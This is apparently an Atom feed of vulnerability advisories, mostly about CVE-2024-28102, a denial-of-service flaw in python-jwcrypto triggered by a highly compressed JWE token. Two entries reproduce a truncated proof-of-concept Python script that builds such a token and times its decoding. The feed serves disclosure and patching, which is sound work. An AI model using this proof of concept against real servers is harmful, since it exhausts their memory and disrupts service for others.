<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T08:04:34.035618+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/alsa-2024:2559</id>
    <title>ALSA-2024:2559 — Moderate: python-jwcrypto security update</title>
    <updated>2026-10-03T08:04:34.291161+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> AlmaLinux:9: python3-jwcrypto</p>
<p>The python-jwcrypto package provides Python implementations of the JSON Web Key (JWK), JSON Web Signature (JWS), JSON Web Encryption (JWE), and JSON Web Token (JWT) JOSE (JSON Object Signing and Encryption) standards.</p>
<p>Security Fix(es):</p>
<p>* python-jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)</p>
<p>For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/alsa-2024:2559"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2024-01978</id>
    <title>bdu:2024-01978</title>
    <updated>2026-10-03T08:04:34.291232+00:00</updated>
    <content>bdu:2024-01978</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2024-01978"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/certfr-2024-avi-0366</id>
    <title>certfr-2024-avi-0366 — De multiples vulnérabilités ont été découvertes dans &lt;span
class="textit"&gt;les produits IBM&lt;/span&gt;. Certaines d'entre el…</title>
    <updated>2026-10-03T08:04:34.291255+00:00</updated>
    <content>certfr-2024-avi-0366</content>
    <link href="https://cve.radiocsirt.org/vuln/certfr-2024-avi-0366"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-162056</id>
    <title>EUVD-2026-162056</title>
    <updated>2026-10-03T08:04:34.291272+00:00</updated>
    <content>EUVD-2026-162056</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-162056"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2024-28102</id>
    <title>fkie_cve-2024-28102</title>
    <updated>2026-10-03T08:04:34.291283+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2024-28102"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-j857-7rvv-vj97</id>
    <title>GHSA-j857-7rvv-vj97 — JWCrypto vulnerable to JWT bomb Attack in `deserialize` function</title>
    <updated>2026-10-03T08:04:34.291305+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: jwcrypto</p>
<p>## Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5</p>
<p>## Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.</p>
<p>## Poc
```python
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))</p>
<p>payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "zip": "DEF",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)</p>
<p>print("-----uncompress-----")</p>
<p>print(len(enc))</p>
<p>begin = time.time()</p>
<p>jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)</p>
<p>print(time.time() - begin)</p>
<p>print("-----compress-----")</p>
<p>payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(com…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-j857-7rvv-vj97"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/gsd-2024-28102</id>
    <title>gsd-2024-28102</title>
    <updated>2026-10-03T08:04:34.291355+00:00</updated>
    <content>gsd-2024-28102</content>
    <link href="https://cve.radiocsirt.org/vuln/gsd-2024-28102"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/oesa-2024-2443</id>
    <title>OESA-2024-2443 — python-jwcrypto security update</title>
    <updated>2026-10-03T08:04:34.291367+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> openEuler:22.03-LTS-SP1: python-jwcrypto</p>
<p>Implements JWK, JWS, JWE specifications with python-cryptography

Security Fix(es):

VUL-0: CVE-2022-3102: python-jwcrypto: jwcrypto token substitution can lead to authentication bypass(CVE-2022-3102)

JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.(CVE-2024-28102)</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/oesa-2024-2443"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/opensuse-su-2024:13798-1</id>
    <title>openSUSE-SU-2024:13798-1 — python310-jwcrypto-1.5.6-2.1 on GA media</title>
    <updated>2026-10-03T08:04:34.291389+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>python310-jwcrypto-1.5.6-2.1 on GA media</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/opensuse-su-2024:13798-1"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-1484</id>
    <title>PYSEC-2026-1484 — JWCrypto vulnerable to JWT bomb Attack in `deserialize` function</title>
    <updated>2026-10-03T08:04:34.291405+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: jwcrypto</p>
<p>## Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5</p>
<p>## Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.</p>
<p>## Poc
```python
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))</p>
<p>payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "zip": "DEF",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(compact=True)</p>
<p>print("-----uncompress-----")</p>
<p>print(len(enc))</p>
<p>begin = time.time()</p>
<p>jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)</p>
<p>print(time.time() - begin)</p>
<p>print("-----compress-----")</p>
<p>payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
    "alg": "RSA-OAEP-256",
    "enc": "A256CBC-HS512",
    "typ": "JWE",
    "kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
                   recipient=public_key,
                   protected=protected_header)
enc = jwetoken.serialize(com…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-1484"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/rhsa-2024:3267</id>
    <title>RHSA-2024:3267 — Red Hat Security Advisory: idm:DL1 and idm:client security update</title>
    <updated>2026-10-03T08:04:34.291447+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>JWCrypto: denail of service  Via specifically crafted JWE python-jwcrypto: malicious JWE token can cause denial of service</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/rhsa-2024:3267"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2024-28102</id>
    <title>UBUNTU-CVE-2024-28102</title>
    <updated>2026-10-03T08:04:34.291466+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:16.04:LTS: python-jwcrypto, Ubuntu:18.04:LTS: python-jwcrypto, Ubuntu:20.04:LTS: python-jwcrypto, Ubuntu:22.04:LTS: python-jwcrypto, Ubuntu:24.04:LTS: python-jwcrypto, Ubuntu:25.10: python-jwcrypto, Ubuntu:26.04:LTS: python-jwcrypto</p>
<p>JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2024-28102"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2024-1003</id>
    <title>WID-SEC-W-2024-1003 — Red Hat Enterprise Linux: Mehrere Schwachstellen</title>
    <updated>2026-10-03T08:04:34.291493+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux ausnutzen, um einen Denial-of-Service-Zustand herbeizuführen, beliebigen Code auszuführen, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, Cross-Site Scripting (XSS)-Angriffe durchzuführen oder einen Men-in-the-Middle-Angriff auszuführen.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2024-1003"/>
  </entry>
</feed>
